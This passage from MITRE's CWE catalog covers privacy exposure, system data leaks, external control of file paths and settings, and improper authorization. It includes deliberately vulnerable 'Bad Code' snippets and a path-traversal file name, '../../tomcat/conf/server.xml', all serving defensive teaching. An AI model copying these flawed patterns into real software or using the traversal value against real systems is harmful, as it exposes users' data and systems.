Depending on its location, the type of business it conducts, and the nature of any private data it handles, an organization may be required to comply with one or more of the following federal and state regulations: - Safe Harbor Privacy Framework [R.359.2] - Gramm-Leach Bliley Act (GLBA) [R.359.3] - Health Insurance Portability and Accountability Act (HIPAA) [R.359.4] - California SB-1386 [R.359.5].

Sometimes data that is not labeled as private can have a privacy implication in a different context. For example, student identification numbers are usually not considered private because there is no explicit and publicly-available mapping to an individual student's personal information. However, if a school generates identification numbers based on student social security numbers, then the identification numbers should be considered private.

Security and privacy concerns often seem to compete with each other. From a security perspective, all important operations should be recorded so that any anomalous activity can later be identified. However, when private data is involved, this practice can in fact create risk. Although there are many ways in which private data can be handled unsafely, a common risk stems from misplaced trust. Programmers often trust the operating environment in which a program runs, and therefore believe that it is acceptable store private information on the file system, in the registry, or in other locally-controlled resources. However, even if access to certain resources is restricted, this does not guarantee that the individuals who do have access can be trusted.

+ Alternate Terms
Privacy leak
Privacy leakage
+ Time of Introduction
  • Architecture and Design
  • Implementation
  • Operation
+ Applicable Platforms

Languages

Language-independent

Architectural Paradigms

Mobile Application

+ Common Consequences
ScopeEffect
Confidentiality

Technical Impact: Read application data

+ Demonstrative Examples

Example 1

In 2004, an employee at AOL sold approximately 92 million private customer e-mail addresses to a spammer marketing an offshore gambling web site [R.359.1]. In response to such high-profile exploits, the collection and management of private data is becoming increasingly regulated.

Example 2

The following code contains a logging statement that tracks the contents of records added to a database by storing them in a log file. Among other values that are stored, the getPassword() function returns the user-supplied plaintext password associated with the account.

(Bad Code)
Example Language: C# 
pass = GetPassword();
...
dbmsLog.WriteLine(id + ":" + pass + ":" + type + ":" + tstamp);

The code in the example above logs a plaintext password to the filesystem. Although many developers trust the filesystem as a safe storage location for data, it should not be trusted implicitly, particularly when privacy is a concern.

Example 3

This code uses location to determine the user's current US State location.

First the application must declare that it requires the ACCESS_FINE_LOCATION permission in the application's manifest.xml:

(Bad Code)
Example Language: XML 
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>

During execution, a call to getLastLocation() will return a location based on the application's location permissions. In this case the application has permission for the most accurate location possible:

(Bad Code)
Example Language: Java 
locationClient = new LocationClient(this, this, this);
locationClient.connect();
Location userCurrLocation;
userCurrLocation = locationClient.getLastLocation();
deriveStateFromCoords(userCurrLocation);

While the application needs this information, it does not need to use the ACCESS_FINE_LOCATION permission, as the ACCESS_COARSE_LOCATION permission will be sufficient to identify which US state the user is in.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class200Information Exposure
Research Concepts (primary)1000
ChildOfCategoryCategory254Security Features
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ChildOfCategoryCategory857CERT Java Secure Coding Section 12 - Input Output (FIO)
Weaknesses Addressed by the CERT Java Secure Coding Standard (primary)844
ChildOfCategoryCategory975SFP Secondary Cluster: Architecture
Software Fault Pattern (SFP) Clusters (primary)888
ParentOfWeakness VariantWeakness Variant202Exposure of Sensitive Data Through Data Queries
Research Concepts (primary)1000
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsPrivacy Violation
CERT Java Secure CodingFIO13-JDo not log sensitive information outside a trust boundary
+ References
[R.359.1] J. Oates. "AOL man pleads guilty to selling 92m email addies". The Register. 2005. <http://www.theregister.co.uk/2005/02/07/aol_email_theft/>.
NIST. "Guide to Protecting the Confidentiality of Personally Identifiable Information (SP 800-122)". April 2010. <http://csrc.nist.gov/publications/nistpubs/800-122/sp800-122.pdf>.
[R.359.2] [REF-2] U.S. Department of Commerce. "Safe Harbor Privacy Framework". <http://www.export.gov/safeharbor/>.
[R.359.3] [REF-3] Federal Trade Commission. "Financial Privacy: The Gramm-Leach Bliley Act (GLBA)". <http://www.ftc.gov/privacy/glbact/index.html>.
[R.359.4] [REF-4] U.S. Department of Human Services. "Health Insurance Portability and Accountability Act (HIPAA)". <http://www.hhs.gov/ocr/hipaa/>.
[R.359.5] [REF-5] Government of the State of California. "California SB-1386". 2002. <http://info.sen.ca.gov/pub/01-02/bill/sen/sb_1351-1400/sb_1386_bill_20020926_chaptered.html>.
[R.359.6] [REF-1] Information Technology Laboratory, National Institute of Standards and Technology. "SECURITY REQUIREMENTS FOR CRYPTOGRAPHIC MODULES". 2001-05-25. <http://csrc.nist.gov/publications/fips/fips140-2/fips1402.pdf>.
[REF-33] Chris Wysopal. "Mobile App Top 10 List". 2010-12-13. <http://www.veracode.com/blog/2010/12/mobile-app-top-10-list/>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings
2009-03-10CWE Content TeamMITREInternal
updated Other_Notes
2009-07-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-12-28CWE Content TeamMITREInternal
updated Other_Notes, References
2010-02-16CWE Content TeamMITREInternal
updated Other_Notes, References
2011-03-29CWE Content TeamMITREInternal
updated Other_Notes
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2011-09-13CWE Content TeamMITREInternal
updated Other_Notes, References
2012-05-11CWE Content TeamMITREInternal
updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings
2013-02-21CWE Content TeamMITREInternal
updated Applicable_Platforms, References
2014-02-18CWE Content TeamMITREInternal
updated Alternate_Terms, Demonstrative_Examples, Description, Name, Other_Notes, References
2014-07-30CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2014-02-18Privacy Violation

CWE-497: Exposure of System Data to an Unauthorized Control Sphere

Weakness ID: 497
Abstraction: Variant
Status: Incomplete
Presentation Filter:
+ Description

Description Summary

Exposing system data or debugging information helps an adversary learn about the system and form an attack plan.

Extended Description

An information exposure occurs when system data or debugging information leaves the program through an output stream or logging function that makes it accessible to unauthorized parties. An attacker can also cause errors to occur by submitting unusual requests to the web application. The response to these errors can reveal detailed system information, deny service, cause security mechanisms to fail, and crash the server. An attacker can use error messages that reveal technologies, operating systems, and product versions to tune the attack against known vulnerabilities in these technologies. An application may use diagnostic methods that provide significant implementation details such as stack traces as part of its error handling mechanism.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

All

+ Common Consequences
ScopeEffect
Confidentiality

Technical Impact: Read application data

+ Demonstrative Examples

Example 1

The following code prints the path environment variable to the standard error stream:

(Bad Code)
Example Language:
char* path = getenv("PATH");
...
sprintf(stderr, "cannot find exe on path %s\n", path);

Example 2

The following code prints an exception to the standard error stream:

(Bad Code)
Example Language: Java 
try {
...
} catch (Exception e) {
e.printStackTrace();
}
(Bad Code)
 
try {
...
} catch (Exception e) {
Console.Writeline(e);
}

Depending upon the system configuration, this information can be dumped to a console, written to a log file, or exposed to a remote user. In some cases the error message tells the attacker precisely what sort of an attack the system will be vulnerable to. For example, a database error message can reveal that the application is vulnerable to a SQL injection attack. Other error messages can reveal more oblique clues about the system. In the example above, the search path could imply information about the type of operating system, the applications installed on the system, and the amount of care that the administrators have put into configuring the program.

Example 3

The following code constructs a database connection string, uses it to create a new connection to the database, and prints it to the console.

(Bad Code)
Example Language: C# 
string cs="database=northwind; server=mySQLServer...";
SqlConnection conn=new SqlConnection(cs);
...
Console.Writeline(cs);

Depending on the system configuration, this information can be dumped to a console, written to a log file, or exposed to a remote user. In some cases the error message tells the attacker precisely what sort of an attack the system is vulnerable to. For example, a database error message can reveal that the application is vulnerable to a SQL injection attack. Other error messages can reveal more oblique clues about the system. In the example above, the search path could imply information about the type of operating system, the applications installed on the system, and the amount of care that the administrators have put into configuring the program.

+ Potential Mitigations

Phases: Architecture and Design; Implementation

Production applications should never use methods that generate internal details such as stack traces and error messages unless that information is directly committed to a log that is not viewable by the end user. All error message text should be HTML entity encoded before being written to the log file to protect against potential cross-site scripting attacks against the viewer of the logs

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class200Information Exposure
Development Concepts (primary)699
Research Concepts (primary)1000
ChildOfWeakness ClassWeakness Class485Insufficient Encapsulation
Seven Pernicious Kingdoms (primary)700
ChildOfCategoryCategory851CERT Java Secure Coding Section 06 - Exceptional Behavior (ERR)
Weaknesses Addressed by the CERT Java Secure Coding Standard (primary)844
ChildOfCategoryCategory880CERT C++ Secure Coding Section 12 - Exceptions and Error Handling (ERR)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory963SFP Secondary Cluster: Exposed Data
Software Fault Pattern (SFP) Clusters (primary)888
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsSystem Information Leak
CERT Java Secure CodingERR01-JDo not allow exceptions to expose sensitive information
CERT C++ Secure CodingERR12-CPPDo not allow exceptions to transmit sensitive information
Software Fault PatternsSFP23Exposed Data
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings, Type
2009-03-10CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-05-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-07-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-10-29CWE Content TeamMITREInternal
updated Description, Other_Notes
2009-12-28CWE Content TeamMITREInternal
updated Description, Name
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Related_Attack_Patterns, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2017-05-03CWE Content TeamMITREInternal
updated Related_Attack_Patterns
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11System Information Leak
2009-12-28Information Leak of System Data

CWE-73: External Control of File Name or Path

Weakness ID: 73
Abstraction: Class
Status: Draft
Presentation Filter:
+ Description

Description Summary

The software allows user input to control or influence paths or file names that are used in filesystem operations.

Extended Description

This could allow an attacker to access or modify system files or other files that are critical to the application.

Path manipulation errors occur when the following two conditions are met:

1. An attacker can specify a path used in an operation on the filesystem.

2. By specifying the resource, the attacker gains a capability that would not otherwise be permitted.

For example, the program may give the attacker the ability to overwrite the specified file or run with a configuration controlled by the attacker.

+ Time of Introduction
  • Architecture and Design
  • Implementation
  • Operation
+ Applicable Platforms

Languages

All

Operating Systems

UNIX: (Often)

Windows: (Often)

Mac OS: (Often)

+ Common Consequences
ScopeEffect
Integrity
Confidentiality

Technical Impact: Read files or directories; Modify files or directories

The application can operate on unexpected files. Confidentiality is violated when the targeted filename is not directly readable by the attacker.

Integrity
Confidentiality
Availability

Technical Impact: Modify files or directories; Execute unauthorized code or commands

The application can operate on unexpected files. This may violate integrity if the filename is written to, or if the filename is for a program or other form of executable code.

Availability

Technical Impact: DoS: crash / exit / restart; DoS: resource consumption (other)

The application can operate on unexpected files. Availability can be violated if the attacker specifies an unexpected file that the application modifies. Availability can also be affected if the attacker specifies a filename for a large file, or points to a special device or a file that does not have the format that the application expects.

+ Likelihood of Exploit

High to Very High

+ Detection Methods

Automated Static Analysis

The external control or influence of filenames can often be detected using automated static analysis that models data flow within the software.

Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes.

+ Demonstrative Examples

Example 1

The following code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as "../../tomcat/conf/server.xml", which causes the application to delete one of its own configuration files (CWE-22).

(Bad Code)
Example Language: Java 
String rName = request.getParameter("reportName");
File rFile = new File("/usr/local/apfr/reports/" + rName);
...
rFile.delete();

Example 2

The following code uses input from a configuration file to determine which file to open and echo back to the user. If the program runs with privileges and malicious users can change the configuration file, they can use the program to read any file on the system that ends with the extension .txt.

(Bad Code)
Example Language: Java 
fis = new FileInputStream(cfg.getProperty("sub")+".txt");
amt = fis.read(arr);
out.println(arr);
+ Observed Examples
ReferenceDescription
Chain: external control of values for user's desired language and theme enables path traversal.
Chain: external control of user's target language enables remote file inclusion.
+ Potential Mitigations

Phase: Architecture and Design

When the set of filenames is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap provide this capability.

Phases: Architecture and Design; Operation

Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict all access to files within a particular directory.

Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.

This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.

Be careful to avoid CWE-243 and other weaknesses related to jails.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When validating filenames, use stringent whitelists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a whitelist of allowable file extensions, which will help to avoid CWE-434.

Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a blacklist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.

Phase: Implementation

Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59).

Phases: Installation; Operation

Use OS-level permissions and run as a low-privileged user to limit the scope of any successful attack.

Phases: Operation; Implementation

If you are using PHP, configure your application so that it does not use register_globals. During implementation, develop your application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.

Phase: Testing

Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible.

Phase: Testing

Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

Phase: Testing

Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules.

+ Weakness Ordinalities
OrdinalityDescription
Primary
(where the weakness exists independent of other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class20Improper Input Validation
Development Concepts (primary)699
Seven Pernicious Kingdoms (primary)700
ChildOfWeakness ClassWeakness Class610Externally Controlled Reference to a Resource in Another Sphere
Research Concepts1000
ChildOfWeakness ClassWeakness Class642External Control of Critical State Data
Research Concepts (primary)1000
ChildOfCategoryCategory723OWASP Top Ten 2004 Category A2 - Broken Access Control
Weaknesses in OWASP Top Ten (2004) (primary)711
ChildOfCategoryCategory7522009 Top 25 - Risky Resource Management
Weaknesses in the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)750
ChildOfCategoryCategory877CERT C++ Secure Coding Section 09 - Input Output (FIO)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory981SFP Secondary Cluster: Path Traversal
Software Fault Pattern (SFP) Clusters (primary)888
CanPrecedeWeakness ClassWeakness Class22Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Research Concepts1000
CanPrecedeWeakness BaseWeakness Base41Improper Resolution of Path Equivalence
Research Concepts1000
CanPrecedeWeakness BaseWeakness Base59Improper Link Resolution Before File Access ('Link Following')
Research Concepts1000
CanPrecedeWeakness BaseWeakness Base98Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
Research Concepts1000
CanPrecedeWeakness BaseWeakness Base434Unrestricted Upload of File with Dangerous Type
Research Concepts1000
CanAlsoBeWeakness BaseWeakness Base99Improper Control of Resource Identifiers ('Resource Injection')
Research Concepts1000
+ Relationship Notes

The external control of filenames can be the primary link in chains with other file-related weaknesses, as seen in the CanPrecede relationships. This is because software systems use files for many different purposes: to execute programs, load code libraries, to store application data, to store configuration settings, record temporary data, act as signals or semaphores to other processes, etc.

However, those weaknesses do not always require external control. For example, link-following weaknesses (CWE-59) often involve pathnames that are not controllable by the attacker at all.

The external control can be resultant from other issues. For example, in PHP applications, the register_globals setting can allow an attacker to modify variables that the programmer thought were immutable, enabling file inclusion (CWE-98) and path traversal (CWE-22). Operating with excessive privileges (CWE-250) might allow an attacker to specify an input filename that is not directly readable by the attacker, but is accessible to the privileged program. A buffer overflow (CWE-119) might give an attacker control over nearby memory locations that are related to pathnames, but were not directly modifiable by the attacker.

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsPath Manipulation
CERT C++ Secure CodingFIO01-CPPBe careful using functions that use file names for identification
CERT C++ Secure CodingFIO02-CPPCanonicalize path names originating from untrusted sources
Software Fault PatternsSFP16Path Traversal
+ References
[REF-21] OWASP. "OWASP Enterprise Security API (ESAPI) Project". <http://www.owasp.org/index.php/ESAPI>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities
2009-01-12CWE Content TeamMITREInternal
updated Applicable_Platforms, Causal_Nature, Common_Consequences, Demonstrative_Examples, Description, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships, Weakness_Ordinalities
2009-03-10CWE Content TeamMITREInternal
updated Potential_Mitigations, Relationships
2009-07-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-10-29CWE Content TeamMITREInternal
updated Common_Consequences, Description
2009-12-28CWE Content TeamMITREInternal
updated Detection_Factors
2010-02-16CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Path Manipulation

CWE-15: External Control of System or Configuration Setting

Weakness ID: 15
Abstraction: Base
Status: Incomplete
Presentation Filter:
+ Description

Description Summary

One or more system settings or configuration elements can be externally controlled by a user.

Extended Description

Allowing external control of system settings can disrupt service or cause an application to behave in unexpected, and potentially malicious ways.

+ Time of Introduction
  • Implementation
+ Modes of Introduction

Setting manipulation vulnerabilities occur when an attacker can control values that govern the behavior of the system, manage specific resources, or in some way affect the functionality of the application.

+ Common Consequences
ScopeEffect
Other

Technical Impact: Varies by context

+ Demonstrative Examples

Example 1

The following C code accepts a number as one of its command line parameters and sets it as the host ID of the current machine.

(Bad Code)
Example Language:
...
sethostid(argv[1]);
...

Although a process must be privileged to successfully invoke sethostid(), unprivileged users may be able to invoke the program. The code in this example allows user input to directly control the value of a system setting. If an attacker provides a malicious value for host ID, the attacker can misidentify the affected machine on the network or cause other unintended behavior.

Example 2

The following Java code snippet reads a string from an HttpServletRequest and sets it as the active catalog for a database Connection.

(Bad Code)
Example Language: Java 
...
conn.setCatalog(request.getParameter("catalog"));
...

In this example, an attacker could cause an error by providing a nonexistent catalog name or connect to an unauthorized portion of the database.

+ Potential Mitigations

Phase: Architecture and Design

Strategy: Separation of Privilege

Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.

Ensure that appropriate compartmentalization is built into the system design and that the compartmentalization serves to allow for and further reinforce privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide when it is appropriate to use and to drop system privileges.

Phases: Implementation; Architecture and Design

Because setting manipulation covers a diverse set of functions, any attempt at illustrating it will inevitably be incomplete. Rather than searching for a tight-knit relationship between the functions addressed in the setting manipulation category, take a step back and consider the sorts of system values that an attacker should not be allowed to control.

Phases: Implementation; Architecture and Design

In general, do not allow user-provided or otherwise untrusted data to control sensitive values. The leverage that an attacker gains by controlling these values is not always immediately obvious, but do not underestimate the creativity of the attacker.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class20Improper Input Validation
Seven Pernicious Kingdoms (primary)700
ChildOfWeakness ClassWeakness Class610Externally Controlled Reference to a Resource in Another Sphere
Research Concepts1000
ChildOfWeakness ClassWeakness Class642External Control of Critical State Data
Development Concepts (primary)699
Research Concepts (primary)1000
ChildOfCategoryCategory994SFP Secondary Cluster: Tainted Input to Variable
Software Fault Pattern (SFP) Clusters (primary)888
+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
7 Pernicious KingdomsSetting Manipulation
Software Fault PatternsSFP25Tainted input to variable
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings
2008-10-14CWE Content TeamMITREInternal
updated Description
2009-01-12CWE Content TeamMITREInternal
updated Relationships
2009-05-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-10-29CWE Content TeamMITREInternal
updated Modes_of_Introduction, Other_Notes
2010-04-05CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2011-06-27CWE Content TeamMITREInternal
updated Common_Consequences
2012-05-11CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2013-02-21CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2017-01-19CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Setting Manipulation

CWE-285: Improper Authorization

Weakness ID: 285
Abstraction: Class
Status: Draft
Presentation Filter:
+ Description

Description Summary

The software does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action.

Extended Description

Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user's privileges and any permissions or other access-control specifications that apply to the resource.

When access control checks are not applied consistently - or not at all - users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution.

+ Alternate Terms
AuthZ:

"AuthZ" is typically used as an abbreviation of "authorization" within the web application security community. It is also distinct from "AuthC," which is an abbreviation of "authentication." The use of "Auth" as an abbreviation is discouraged, since it could be used for either authentication or authorization.

+ Time of Introduction
  • Architecture and Design
  • Implementation
  • Operation
+ Applicable Platforms

Languages

Language-independent

Technology Classes

Web-Server: (Often)

Database-Server: (Often)

+ Modes of Introduction

A developer may introduce authorization weaknesses because of a lack of understanding about the underlying technologies. For example, a developer may assume that attackers cannot modify certain inputs such as headers or cookies.

Authorization weaknesses may arise when a single-user application is ported to a multi-user environment.

+ Common Consequences
ScopeEffect
Confidentiality

Technical Impact: Read application data; Read files or directories

An attacker could read sensitive data, either by reading the data directly from a data store that is not properly restricted, or by accessing insufficiently-protected, privileged functionality to read the data.

Integrity

Technical Impact: Modify application data; Modify files or directories

An attacker could modify sensitive data, either by writing the data directly to a data store that is not properly restricted, or by accessing insufficiently-protected, privileged functionality to write the data.

Access Control

Technical Impact: Gain privileges / assume identity

An attacker could gain privileges by modifying or reading critical data directly, or by accessing insufficiently-protected, privileged functionality.

+ Likelihood of Exploit

High

+ Detection Methods

Automated Static Analysis

Automated static analysis is useful for detecting commonly-used idioms for authorization. A tool may be able to analyze related configuration files, such as .htaccess in Apache web servers, or detect the usage of commonly-used authorization libraries.

Generally, automated static analysis tools have difficulty detecting custom authorization schemes. In addition, the software's design may include some functionality that is accessible to any user and does not require an authorization check; an automated technique that detects the absence of authorization may report false positives.

Effectiveness: Limited

Automated Dynamic Analysis

Automated dynamic analysis may find many or all possible interfaces that do not require authorization, but manual analysis is required to determine if the lack of authorization violates business logic

Manual Analysis

This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.

Specifically, manual static analysis is useful for evaluating the correctness of custom authorization mechanisms.

Effectiveness: Moderate

These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. However, manual efforts might not achieve desired code coverage within limited time constraints.

Manual Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies

Effectiveness: SOAR Partial

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Web Application Scanner

  • Web Services Scanner

  • Database Scanners

Effectiveness: SOAR Partial

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Host Application Interface Scanner

  • Fuzz Tester

  • Framework-based Fuzzer

  • Forced Path Execution

  • Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious

Effectiveness: SOAR Partial

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Focused Manual Spotcheck - Focused manual analysis of source

  • Manual Source Code Review (not inspections)

Effectiveness: SOAR Partial

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR Partial

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Formal Methods / Correct-By-Construction

Cost effective for partial coverage:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

Effectiveness: SOAR High

+ Demonstrative Examples

Example 1

This function runs an arbitrary SQL query on a given database, returning the result of the query.

(Bad Code)
Example Language: PHP 
function runEmployeeQuery($dbName, $name){
mysql_select_db($dbName,$globalDbHandle) or die("Could not open Database".$dbName);
//Use a prepared statement to avoid CWE-89
$preparedStatement = $globalDbHandle->prepare('SELECT * FROM employees WHERE name = :name');
$preparedStatement->execute(array(':name' => $name));
return $preparedStatement->fetchAll();
}
/.../
$employeeRecord = runEmployeeQuery('EmployeeDB',$_GET['EmployeeName']);

While this code is careful to avoid SQL Injection, the function does not confirm the user sending the query is authorized to do so. An attacker may be able to obtain sensitive employee information from the database.

Example 2

The following program could be part of a bulletin board system that allows users to send private messages to each other. This program intends to authenticate the user before deciding whether a private message should be displayed. Assume that LookupMessageObject() ensures that the $id argument is numeric, constructs a filename based on that id, and reads the message details from that file. Also assume that the program stores all private messages for all users in the same directory.

(Bad Code)
Example Language: Perl 
sub DisplayPrivateMessage {
my($id) = @_;
my $Message = LookupMessageObject($id);
print "From: " . encodeHTML($Message->{from}) . "<br>\n";
print "Subject: " . encodeHTML($Message->{subject}) . "\n";
print "<hr>\n";
print "Body: " . encodeHTML($Message->{body}) . "\n";
}

my $q = new CGI;
# For purposes of this example, assume that CWE-309 and
# CWE-523 do not apply.
if (! AuthenticateUser($q->param('username'), $q->param('password'))) {
ExitError("invalid username or password");
}

my $id = $q->param('id');
DisplayPrivateMessage($id);

While the program properly exits if authentication fails, it does not ensure that the message is addressed to the user. As a result, an authenticated attacker could provide any arbitrary identifier and read private messages that were intended for other users.

One way to avoid this problem would be to ensure that the "to" field in the message object matches the username of the authenticated user.

+ Observed Examples
ReferenceDescription
Web application does not restrict access to admin scripts, allowing authenticated users to reset administrative passwords.
Web application does not restrict access to admin scripts, allowing authenticated users to modify passwords of other users.
Web application stores database file under the web root with insufficient access control (CWE-219), allowing direct request.
Terminal server does not check authorization for guest access.
Database server does not use appropriate privileges for certain sensitive operations.
Gateway uses default "Allow" configuration for its authorization settings.
Chain: product does not properly interpret a configuration option for a system group, allowing users to gain privileges.
Chain: SNMP product does not properly parse a configuration option for which hosts are allowed to connect, allowing unauthorized IP addresses to connect.
System monitoring software allows users to bypass authorization by creating custom forms.
